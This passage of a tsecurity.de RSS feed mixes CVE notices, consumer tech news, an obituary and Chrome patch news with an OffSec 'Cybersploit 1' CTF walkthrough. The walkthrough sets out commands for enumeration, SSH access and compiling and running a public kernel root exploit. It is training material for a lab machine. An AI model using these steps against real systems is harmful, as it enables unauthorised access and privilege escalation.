<link>https://tsecurity.de/de/3567764/sicherheitsluecken/cve-2015-2177-siemens-simatic-s7-300-cpu-input-validation-ssa-987029-edb-44802/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567764/sicherheitsluecken/cve-2015-2177-siemens-simatic-s7-300-cpu-input-validation-ssa-987029-edb-44802/</guid>
<pubDate>Wed, 03 Jun 2026 00:23:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/siemens:simatic_s7-300_cpu">Siemens SIMATIC S7-300 Cpu</a>. Impacted is an unknown function. This manipulation causes improper input validation.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2015-2177">CVE-2015-2177</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6477 | Nordex Control 2 SCADA up to 16 Wind Farm Portal Application cross site scripting (ID 135068)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Nordex Control 2 SCADA up to 16. The affected element is an unknown function of the component Wind Farm Portal Application. Performing a manipulation results in cross site scripting.

This vulnerability was named CVE-2015-647...]]></description>
<link>https://tsecurity.de/de/3567763/sicherheitsluecken/cve-2015-6477-nordex-control-2-scada-up-to-16-wind-farm-portal-application-cross-site-scripting-id-135068/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567763/sicherheitsluecken/cve-2015-6477-nordex-control-2-scada-up-to-16-wind-farm-portal-application-cross-site-scripting-id-135068/</guid>
<pubDate>Wed, 03 Jun 2026 00:23:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/nordex:control_2_scada">Nordex Control 2 SCADA up to 16</a>. The affected element is an unknown function of the component <em>Wind Farm Portal Application</em>. Performing a manipulation results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2015-6477">CVE-2015-6477</a>. The attack may be initiated remotely. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to View Your 2026 Apple Music Replay Playlist]]></title>
<description><![CDATA[If you've been listening to music on Apple Music this year, your 2026 Apple Music Replay playlist may already be available. Unlike Spotify Wrapped, which arrives once a year, Apple Music Replay updates throughout the year and gives subscribers a running look at their most-played songs, artists, a...]]></description>
<link>https://tsecurity.de/de/3566359/ios-mac-os/how-to-view-your-2026-apple-music-replay-playlist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566359/ios-mac-os/how-to-view-your-2026-apple-music-replay-playlist/</guid>
<pubDate>Tue, 02 Jun 2026 15:56:15 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you've been listening to music on Apple Music this year, your 2026 Apple Music Replay playlist may already be available. Unlike Spotify Wrapped, which arrives once a year, Apple Music Replay updates throughout the year and gives subscribers a running look at their most-played songs, artists, albums, and listening milestones. 



Apple started rolling out Replay 2026 in early February, and the playlist continues to update automatically every week. The feature has become even easier to access thanks to the latest Apple Music updates. In iOS 26, Replay is integrated directly into the Music app, allowing users to view stats and playlists without opening a web browser.



Whether you want to see your top songs of the year, track your listening habits, or share your stats with friends, here's everything you need to know.



Table of contentsMethod 1: Apple Music AppMethod 2: Apple Music WebMethod 3: Share Your Apple Music Replay StatsWhat Does Apple Music Replay Track?Why Can't I See My 2026 Replay Yet?How Often Does Apple Music Replay Update?FAQsSummaryConclusion



Method 1: Apple Music App



Apple has made Replay easier to find by adding it directly to the Apple Music app.







The Replay section includes your annual playlist along with monthly listening insights, top artists, top songs, listening milestones, and other statistics.




Open the Apple Music app on your iPhone or iPad.



Tap the Home tab.



Scroll down until you see "Replay: Your Top Music."



Select "Replay '26" to open your yearly playlist.



Tap "Your [Month] Replay is Here" to view detailed statistics and monthly summaries.



Press the + button to add the playlist to your library.




Once added, the playlist updates automatically every week throughout 2026.



Method 2: Apple Music Web



If you prefer using a browser, Apple still offers Replay through its dedicated web portal.



The web version provides a more detailed breakdown of your listening activity, including artists, albums, songs, monthly milestones, and yearly trends.




Visit Apple Music Replay.



Sign in using the same Apple ID linked to your Apple Music subscription.



Open your Replay dashboard.



Browse your:

Top Songs



Top Artists



Top Albums



Total listening time



Monthly listening summaries





Open the Replay 2026 playlist and add it to your library if you haven't already.




Method 3: Share Your Apple Music Replay Stats



Apple Music now lets users create shareable cards from many Replay statistics.



You can generate custom images showing your favorite artists, top songs, listening milestones, and more.




Open the Replay section.



Select any stat or report page.



Tap the Share button.



Choose your preferred sharing method.



Share the generated image on social media or messaging apps.




This makes it easy to showcase your music habits without waiting for a year-end recap.



What Does Apple Music Replay Track?



Replay goes beyond a simple playlist.



It continuously tracks your listening activity throughout the year and creates a personalized overview of your music habits.



Replay can include:




Top 100 most-played songs



Favorite artists



Most-played albums



Total listening hours



Number of artists played



Number of songs played



Monthly listening summaries



Listening milestones such as 1,000 songs played



Historical Replay playlists from previous years




Apple also keeps Replay archives dating back to earlier years, allowing many subscribers to revisit playlists going back to the launch of Apple Music in 2015.



Why Can't I See My 2026 Replay Yet?



Not every subscriber will see Replay immediately.



Here are the most common reasons:



1. You Haven't Listened EnoughApple requires a minimum amount of listening activity before generating Replay statistics.



2. Listening History Is DisabledReplay depends on listening history.



To check:




Open Settings.



Tap Music.



Enable Use Listening History.




If this setting is turned off, Apple cannot build your Replay profile.



3. Replay Is Still Processing



New Replay playlists can sometimes take several hours or days to appear after meeting the listening requirements.



How Often Does Apple Music Replay Update?



One of the biggest differences between Replay and Spotify Wrapped is that Replay updates throughout the year.



Apple Music Replay 2026 refreshes every week, with playlist rankings changing based on your latest listening habits. New songs can enter the playlist while older tracks may move down or disappear. The playlist continues evolving until the end of December.



FAQs



Is Apple Music Replay 2026 available now? Yes. Apple began rolling out Replay 2026 in early February 2026 for eligible subscribers.  How many songs are in the Replay playlist? The Replay playlist contains your Top 100 most-played songs of the year.  Does Replay update automatically? Yes. Once added to your library, Replay updates automatically every week.  Can I see previous years' Replay playlists? Yes. Apple keeps Replay playlists from previous years, allowing you to revisit your listening history.  Is Apple Music Replay the same as Spotify Wrapped? No. Spotify Wrapped is released once per year, while Apple Music Replay updates continuously throughout the year and provides ongoing listening statistics.  



Summary




Open Apple Music and go to the Home tab.



Scroll to Replay: Your Top Music.



Select Replay '26 to view your playlist.



Open monthly Replay reports for detailed stats.



Add the playlist to your library.



Enable Use Listening History if Replay doesn't appear.



Check the Replay web portal for additional insights.



Share your stats using Apple's built-in sharing tools.



Enjoy weekly updates throughout 2026.



Revisit older Replay playlists to compare your music taste over the years.




Conclusion



The 2026 Apple Music Replay playlist is already live and offers a much earlier look at your listening habits than most competing music services. Instead of waiting until December, Apple Music subscribers can watch their top songs, artists, and albums evolve throughout the year. 



With Replay now integrated directly into the Music app and updated every week, it's easier than ever to keep track of the soundtrack of your year. Whether you're curious about your current favorites or want to compare playlists from past years, Replay remains one of the most useful features available to Apple Music subscribers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Unverhofft Jugend-forscht-Preisträger: KI „Jacob“ für Leichte Sprache]]></title>
<description><![CDATA[Ein Abiturient aus Brandenburg hat ein Sprachmodell trainiert, das komplexe Inhalte in Leichte Sprache übersetzt. Für "Jacob" erhielt er einen KI-Sonderpreis.]]></description>
<link>https://tsecurity.de/de/3562471/it-nachrichten/unverhofft-jugend-forscht-preistraeger-ki-jacob-fuer-leichte-sprache/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562471/it-nachrichten/unverhofft-jugend-forscht-preistraeger-ki-jacob-fuer-leichte-sprache/</guid>
<pubDate>Mon, 01 Jun 2026 11:17:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Abiturient aus Brandenburg hat ein Sprachmodell trainiert, das komplexe Inhalte in Leichte Sprache übersetzt. Für "Jacob" erhielt er einen KI-Sonderpreis.]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of May 24, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of May 24, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3561022/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-may-24-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561022/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-may-24-2026/</guid>
<pubDate>Sun, 31 May 2026 17:31:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of May 24, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-05-24/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux is literally a breath of fresh air for my Zenbook!]]></title>
<description><![CDATA[On both the stock Windows 11 install and the ASUS Windows 11 install this 16GB machine struggled. It would stutter in games and even the desktop itself would slow to a crawl sometimes, even with the latest drivers installed. I thought I might as well wipe it and start over with Linux and I'm glad...]]></description>
<link>https://tsecurity.de/de/3559976/linux-tipps/linux-is-literally-a-breath-of-fresh-air-for-my-zenbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559976/linux-tipps/linux-is-literally-a-breath-of-fresh-air-for-my-zenbook/</guid>
<pubDate>Sun, 31 May 2026 03:54:01 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>On both the stock Windows 11 install and the ASUS Windows 11 install this 16GB machine struggled. It would stutter in games and even the desktop itself would slow to a crawl sometimes, even with the latest drivers installed.</p> <p>I thought I might as well wipe it and start over with Linux and I'm glad I did! I now get 60-120FPS in all of the games I've tried at the native res or 1080p (Mainly 2015 and earlier games, nothing too modern). The fan is not running constantly and the laptop runs much cooler on the whole.</p> <p>Also the NPU is not left out from the fun thanks to the FastflowLM project and Lemonade server. Everything, apart from the battery limit charge, is supported!</p> <p>Honestly, for a laptop that came out only last year, this is pretty fantastic!! I've always loved Linux but this experience makes me love it even more.</p> <p>For anybody wanting this wallpaper, here is the link: <a href="https://wallpaperaccess.com/asus-zenbook-14">https://wallpaperaccess.com/asus-zenbook-14</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/c64z86"> /u/c64z86 </a> <br> <span><a href="https://i.redd.it/ecpvmc9jld4h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tshgsp/linux_is_literally_a_breath_of_fresh_air_for_my/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[RIP: Marcia Lucas, Oscar-Winning Star Wars Editor, Dies At 80]]></title>
<description><![CDATA[```Long-time Slashdot reader schwit1 brings word that Marcia Lucas, part of the editing team for both Star Wars and Return of the Jedi, has died at age 80 after a battle with metastatic cancer. 

Married to George Lucas from 1969 to 1983, Marcia is remembered by The Wrap as "a powerful asset in t...]]></description>
<link>https://tsecurity.de/de/3558282/it-security-nachrichten/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558282/it-security-nachrichten/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80/</guid>
<pubDate>Sat, 30 May 2026 05:34:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[```Long-time Slashdot reader schwit1 brings word that Marcia Lucas, part of the editing team for both Star Wars and Return of the Jedi, has died at age 80 after a battle with metastatic cancer. 

Married to George Lucas from 1969 to 1983, Marcia is remembered by The Wrap as "a powerful asset in the early days of the Star Wars series, helping shape its voice and identity long before it became the massive global franchise..."

She won an Academy Award for Best Film Editing for her work on the original "Star Wars" movie, an award that came four years after she was nominated for editing George's previous film, "American Graffiti." She additionally edited his debut feature, "THX 1138." Beyond these collaborations with her then-husband, Marcia worked as an editor with other acclaimed filmmakers like Martin Scorsese and Francis Ford Coppola. She was credited as sole editor for Scorsese's "Alice Doesn't Live Here Anymore," and served as supervising editor for "Taxi Driver" and "New York, New York." 

Marcia served as part of a three-person crew editing both "Star Wars" and "Return of the Jedi." On the first film, she worked alongside Paul Hirsch and Richard Chew and was personally responsible for editing the Battle of Yavin — otherwise known as the iconic "trench run" sequence near the end of the film. For "Return of the Jedi," Marcia shared credit with Sean Barton and Duwayne Dunham. 

"If only Lucas had people like her on the prequels instead of sycophants who worshipped him as a God..." argues this 2015 blog post noting an article calling her "the secret weapon behind Star Wars — including this anecdote from The Secret History of Star Wars :

The [Star Wars] Death Star trench run was originally scripted entirely different, with Luke having two runs at the exhaust port; Marcia had re-ordered the shots almost from the ground up, trying to build tension lacking in the original scripted sequence, which was why this one was the most complicated (Deleted Magic has a faithful reproduction of the original assembly, which is surprisingly unsatisfying). 

She warned George, "If the audience doesn't cheer when Han Solo comes in at the last second in the Millennium Falcon to help Luke when he's being chased by Darth Vader, the picture doesn't work." 


Thanks to long-time Slashdot reader schwit1 for sharing the news.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=RIP%3A+Marcia+Lucas%2C+Oscar-Winning+Star+Wars+Editor%2C+Dies+At+80%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F05%2F30%2F0246210%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F05%2F30%2F0246210%2Frip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/05/30/0246210/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ON THIS DAY: In 2015, we unboxed the Verizon LG Lancet with Windows Phone 8.1, a phone even I forgot about it]]></title>
<description><![CDATA[A look back at the LG Lancet and the era when Windows Phone 8.1 defined Microsoft’s mobile peak.]]></description>
<link>https://tsecurity.de/de/3557959/windows-tipps/on-this-day-in-2015-we-unboxed-the-verizon-lg-lancet-with-windows-phone-81-a-phone-even-i-forgot-about-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557959/windows-tipps/on-this-day-in-2015-we-unboxed-the-verizon-lg-lancet-with-windows-phone-81-a-phone-even-i-forgot-about-it/</guid>
<pubDate>Sat, 30 May 2026 01:20:20 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A look back at the LG Lancet and the era when Windows Phone 8.1 defined Microsoft’s mobile peak.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersploit 1 Walkthrough — OffSec | Beginner Guide & Screenshots]]></title>
<description><![CDATA[Cybersploit 1 Walkthrough — OffSec | Beginner Guide & ScreenshotsI’m a professional penetration tester with hands-on red-team experience and OSCP-style practice. I treat every engagement — even CTF boxes — with the same discipline: methodical reconnaissance, prioritized attack paths, and clean, r...]]></description>
<link>https://tsecurity.de/de/3556664/hacking/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556664/hacking/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots/</guid>
<pubDate>Fri, 29 May 2026 11:35:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Cybersploit 1 Walkthrough — OffSec | Beginner Guide &amp; Screenshots</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*zf3qwgqHK-aFmGpQT5G37g.jpeg"></figure><p>I’m a professional penetration tester with hands-on red-team experience and OSCP-style practice. I treat every engagement — even CTF boxes — with the same discipline: methodical reconnaissance, prioritized attack paths, and clean, reproducible exploitation. I’m passionate about improving my craft and sharing practical knowledge that helps others learn faster.</p><p><strong><em>Introduction</em></strong></p><p>This Cybersploit1 walkthrough walks through the exact steps I took to compromise the machine: reconnaissance, web enumeration, credential discovery, SSH access, and local privilege escalation. You’ll find the precise commands I used, why I used them, annotated screenshots for verification, and short post-exploit checks — presented so beginners can follow and experienced testers can reproduce.</p><p><strong><em>Reconnaissance</em></strong></p><p>I started with a simple Nmap scan to identify open ports and services:</p><pre>nmap -sC -sV -p- - min-rat 1000 192.168.122.92</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/845/1*SSzNEcEeUAneWBVUVQyKLA.png"></figure><p>The scan showed two open services: HTTP on port 80 and SSH on port 22. I opened the HTTP service in a browser and saw a simple web page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/864/1*ipUgKwdwRzzmSMV4PWrc2Q.png"></figure><p>The site’s UI had non-functional tabs, so the next step was to view the page source.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hYelqeEP6iTwuIS3XWXSkw.png"></figure><p>At the bottom of the HTML I found a hint: a username itsskv. I saved that — likely an SSH username.</p><p><strong><em>Web enumeration</em></strong></p><p>I used a directory fuzzing tool to find hidden files and directories. I prefer it ffuf because it’s fast and flexible:</p><pre>ffuf -u http://192.168.122.92/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50 -mc 200</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*4hX9l8DjQQ1HobK75FEn1A.png"></figure><p>From the discovered directories I inspected /hacker and found an image and a robots.txt entry. The robots.txt contained a suspicious hash string</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*SN7mM9ABkDiJXA-P2SiaOw.png"></figure><p>To decode the hash, I used CyberChef (or any base64 decoder). After trying different decodings, it turned out to be <strong>Base64</strong>, which revealed the password for the itsskv user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*M2iB5-Tvfa7hoB8x_nVz2Q.png"></figure><p><strong>Why CyberChef?</strong> CyberChef is an interactive tool that lets you quickly try common encodings/transforms (Base64, hex, rot, gzip, etc.) without guessing blindly.</p><p><strong><em>Initial access — SSH</em></strong></p><p>With itsskv and the decoded password, I SSHed to the machine:</p><pre>ssh itsskv@192.168.120.92</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*32fmPvmKeKm-a4Ajh5zVmg.png"></figure><p>After logging in, I checked the home directory and found local.txt and flag2.txt. local.txt contained a flag string; flag2.txt said “Your flag is in another file...” (typical CTF hint).</p><pre>ls -la<br>cat local.txt<br>cat flag2.txt<br>uname -a<br>cat /etc/issue</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iDpxkGDzyCC_Od3BnNrtsA.png"></figure><p>After that, I did basic enumeration</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1003/1*nrln226vnbh9iqLoG7FR6A.png"></figure><p>This shows an old Linux kernel: <strong>3.13.0–32</strong> on Ubuntu 12.04 LTS — important because old kernels often have local privilege escalation vulnerabilities.</p><p><strong>Kernel vulnerabilities — choosing an exploit</strong></p><p>Common kernel LPEs against kernels in this family include:</p><ul><li><strong>OverlayFS local root</strong> (CVE-2015–1328) — affects certain kernel versions and configurations.</li><li><strong>Dirty COW</strong> (CVE-2016–5195) — widely exploited against older kernels.</li></ul><p>I searched Exploit-DB and found an exploit (ID <strong>37292</strong>) that targets a vulnerability applicable to this kernel. Link (for your notes): <a href="https://www.exploit-db.com/exploits/37292.">https://www.exploit-db.com/exploits/37292.</a></p><blockquote><strong><em>Note:</em></strong><em> Always verify whether an exploit is suitable for the exact kernel and architecture (i386 vs x86_64). Misapplying an exploit can crash the box.</em></blockquote><p><strong><em>Preparing the exploit on the target</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Pz_TmCpZO44gE9qNvLcsuQ.png"></figure><p>The target system lacked network utilities like wget/curl, so I copied the exploit code manually: I opened nano 37292.c on the target and pasted the C source into a file.</p><p>Commands I used to inspect and prepare the file:</p><pre>ls -l 37292.c<br>head -n 20 37292.c   # show the first 20 lines to confirm it's the expected C source</pre><p>Why ls -l and head -n?</p><p>ls -l shows file size and permissions so you can confirm the file was saved and is the expected size.</p><p>head -n 20 quickly inspects the top of the file to confirm it contains C source (includes, function signatures) before compiling.</p><pre>gcc 37292.c -o  expoilt<br>chmod +x expoilt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pLso46qXMM_vorZrOOQj5g.png"></figure><p><strong>Why </strong><strong>gcc 37292.c -o exploit?</strong></p><ul><li>gcc is the GNU C Compiler. -o exploit names the output binary exploit (instead of default a.out), which keeps things tidy and obvious.</li><li>Compiling on the target ensures the binary is built for the target architecture and libc, avoiding cross-architecture problems.</li></ul><p>Then I made it executable and ran it:</p><pre>chmod +x exploit<br>./exploit</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/997/1*d8LhPITR7cIDAiTxYPQI9A.png"></figure><p>After a short wait, I switched to the elevated root shell:</p><h3>Post-exploit validation and notes</h3><ul><li>I validated privileged access by listing /root and reading proof.txt. This confirms local privilege escalation success.</li><li>Avoid leaving any artifacts on real systems. For CTFs, this is fine, but on real engagements, you must clean up and follow the rules of engagement.</li></ul><h3>Lessons learned / takeaways</h3><ol><li>Start small: scan (Nmap) and follow high-value paths (web → creds → SSH).</li><li>Inspect page source &amp; fuzz directories (HTML comments, robots.txt).</li><li>Check kernel/arch (uname -a) before chasing LPEs; compile exploits on-target if needed.</li><li>Validate exploits and always follow rules of engagement.</li></ol><p>Thank you for reading!!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=25b56fbf759b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots-25b56fbf759b">Cybersploit 1 Walkthrough — OffSec | Beginner Guide &amp; Screenshots</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google schließt mehr als 150 Chrome-Lücken]]></title>
<description><![CDATA[Mit den neuen Chrome-Versionen 148.0.7778.216/217 für Windows, 148.0.7778.2015/216 für macOS sowie 148.0.7778.215 für Linux haben die Google-Entwickler mehr als 150 Sicherheitslücken geschlossen. Bislang wird laut Google keine der gestopften Lücken für Angriffe ausgenutzt. Die Hersteller anderer ...]]></description>
<link>https://tsecurity.de/de/3556337/it-nachrichten/google-schliesst-mehr-als-150-chrome-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556337/it-nachrichten/google-schliesst-mehr-als-150-chrome-luecken/</guid>
<pubDate>Fri, 29 May 2026 09:17:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mit den neuen Chrome-Versionen 148.0.7778.216/217 für Windows, 148.0.7778.2015/216 für macOS sowie 148.0.7778.215 für Linux haben die Google-Entwickler mehr als 150 Sicherheitslücken geschlossen. Bislang wird laut Google keine der gestopften Lücken für Angriffe ausgenutzt. Die Hersteller anderer Chromium-basierter Browser dürften in den kommenden Tagen nachziehen, <a href="https://www.pcwelt.de/article/3151073/google-schliesst-mehr-als-150-chrome-luecken.html#toc-1">Brave hat bereits vorgelegt</a>.</p>



<p>Im <a href="https://chromereleases.googleblog.com/" target="_blank" rel="noreferrer noopener">Chrome Release Blog</a> führt Srinivas Sista mit einem Tag Verzug 151 beseitigte Sicherheitslücken auf. Google hat 134 dieser Schwachstellen selbst entdeckt, 17 wurden durch externe Sicherheitsforscher aufgespürt und gemeldet. Diesen Forschern hat Google bislang 137.500 US-Dollar an Prämien zuerkannt.</p>



<p>Als kritisch ausgewiesen sind 22 Schwachstellen: CVE-2026-9872 bis -9893. Use-after-free-Lücken machen mehr als die Hälfte der kritischen Schwachstellen aus, insgesamt sind es 66 der 151 Lücken. Weitere 123 Sicherheitslücken sind als hohes, die übrigen sechs Rest als mittleres Risiko eingestuft. Allein 35 Schwachstellen sind in der OpenGL-Bibliothek ANGLE geschlossen worden, vier davon sind als kritisch eingestuft.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>In der letzten Woche hatte Google ein <a href="https://www.pcwelt.de/article/3144922/neues-chrome-update-behebt-kritische-browser-luecken.html" data-type="link" data-id="https://www.pcwelt.de/article/3144922/neues-chrome-update-behebt-kritische-browser-luecken.html" target="_blank" rel="noreferrer noopener">Sicherheits-Update für Chrome</a> bereitgestellt, um 16 Sicherheitslücken zu schließen. In aller Regel aktualisiert sich Chrome automatisch, wenn eine neue Version verfügbar ist. Mit dem Menü-Eintrag <em>» Hilfe » Über Google Chrome</em> können Sie die Update-Prüfung manuell anstoßen.</p>



<p>Google hat in dieser Woche auch Chrome für Android 148.0.7778.215 und Chrome für iOS 149.0.7827.45 bereitgestellt. In der Android-Version sind die gleichen Schwachstellen beseitigt wie in den Desktop-Ausgaben. Der Extended Stable Channel für Windows und macOS enthält nun die Chromium-Version 148.0.7778.217.</p>



<p>Die Freigabe der Chrome-Version 149 ist in der kommenden Woche zu erwarten. Google liefert bereits seit letzter Woche Chrome 149 (149.0.7827.22) an etwa 0,5 Prozent der Nutzer aus („Early Stable Update“), um Feedback und vor allem Daten zu sammeln.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Andere Chromium-basierte Browser</h2>



<p>Die Hersteller anderer auf Chromium basierender Browser sind nun wieder gefordert, mit Updates nachzuziehen. Brave hat seinen Browser bereits am 28. Mai auf den neuesten Stand gebracht. Für Brave 1.90.128 haben die Entwickler die abgesicherte Chromium-Version 148.0.7778.217 verwendet. Sie beheben mit diesem Update auch zwei Brave-spezifische Schwachstellen, die über HackerOne gemeldet wurden. Vivaldi und Edge sind auf dem Sicherheitsstand der letzten Woche.</p>



<p>Opera hat am 28. Mai die neue Hauptversion 132 freigegeben, die auf Chromium 148 basiert. In Opera One 132.0.5905.11 ist jedoch die drei Wochen alte Chromium-Version 148.0.7778.97 verbaut, die etliche bekannte Sicherheitslücken aufweist. In der nächsten Woche dürfte Google bereits Chrome/Chromium 149 freigeben, doch die gute Nachricht für Nutzer Opera und Vivaldi ist, dass Chromium 148 im Extended Stable Channel bis zur Freigabe von Chrome 150 mit Sicherheits-Updates versorgt wird.</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<p><strong>Chromium-basierte Browser in der Übersicht:</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th><strong>Browser</strong></th><th>Version</th><th>Chromium-Version</th><th>abgesichert?</th></tr></thead><tbody><tr><td><a href="https://www.pcwelt.de/article/1135017/google-chrome.html" target="_blank" rel="noreferrer noopener" title="Download">Google Chrome ↓</a></td><td>148.0.7778.217</td><td>148.0.7778.217</td><td>🟢</td></tr><tr><td><a href="https://www.pcwelt.de/article/1191500/brave-browser.html" target="_blank" rel="noreferrer noopener" title="Download">Brave ↓</a></td><td>1.90.128</td><td>148.0.7778.217</td><td>🟢</td></tr><tr><td>Microsoft Edge</td><td>148.0.3967.83</td><td>148.0.7778.180</td><td>🟡</td></tr><tr><td><a href="https://www.pcwelt.de/article/1082991/browser-opera.html" target="_blank" rel="noreferrer noopener" title="Download">Opera One ↓</a></td><td>132.0.5905.11</td><td>148.0.7778.97</td><td>🟠</td></tr><tr><td><a href="https://www.pcwelt.de/article/1151272/vivaldi.html" target="_blank" rel="noreferrer noopener" title="Download">Vivaldi ↓</a></td><td>8.0.4033.34</td><td>148.0.7778.183</td><td>🟡</td></tr></tbody></table><figcaption class="wp-element-caption"><em>Chromium-basierte Browser – Stand: 28.05.2026</em></figcaption></figure>
</div></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Irish datacentres have increased household bills by hundreds of euros, report finds]]></title>
